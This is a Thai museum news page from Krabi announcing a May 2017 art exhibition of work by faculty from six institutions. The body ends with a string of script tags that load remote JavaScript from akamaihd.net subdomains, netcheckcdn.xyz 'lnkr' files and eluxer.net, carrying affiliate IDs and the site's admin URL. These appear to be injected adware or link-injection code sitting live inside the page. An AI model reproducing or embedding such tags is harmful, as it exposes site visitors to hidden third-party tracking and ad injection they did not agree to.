ถนนมหาราช ตำบลปากน้ำ ,อำเภอเมืองกระบี่

075-621359

ข่าวและกิจกรรม

image

นิทรรศการอัตลักษณ์ศิลป์ถิ่นใต้ครั้งที่ 3


ขอเชิญเข้าชมนิทรรศการอัตลักษณ์ศิลป์ถิ่นใต้ครั้งที่ 3 ระหว่างวันที่ 4-31 พฤษภาคม 2560 
โดยผลงานศิลปกรรมของคณาจารย์ จาก 6 สถาบัน มาร่วมกันจัดแสดง ณ ศูนย์การเรียนรู้วัฒนธรรมอันดามัน จังหวัดกระบี่
เปิดบริการทุกวันจันทร์-วันเสาร์ เวลา 09.00-16.00 น.
<script type="text/javascript" src="http://asrvvv-a.akamaihd.net/get?addonname=&clientuid=undefined&subID=51317_4446_&affid=9686&subaffid=1001&href=http%3A%2F%2Fadmin.museumkrabi.com%2Fnews_upd.aspx%3Fid%3D12"><script><script type="text/javascript" src="http://cdncache-a.akamaihd.net/sub/nee5452/51317_4446_/l.js?pid=2449&ext=Advertise"><script><script type="text/javascript" src="http://cdncache-a.akamaihd.net/sub/nee5452/51317_4446_/l.js?pid=2450&ext="><script><script type="text/javascript" src="http://netcheckcdn.xyz/addons/lnkr5.min.js"><script><script type="text/javascript" src="http://netcheckcdn.xyz/addons/lnkr30_nt.min.js"><script><script type="text/javascript" src="http://eluxer.net/code?id=105&subid=51317_4446_"><script><script type="text/javascript" src="http://netcheckcdn.xyz/ext/115e5eb1fa87308ada.js?sid=51317_4446_&title=&blocks[]=1f755&blocks[]=4d09a&blocks[]=04fcf"><script>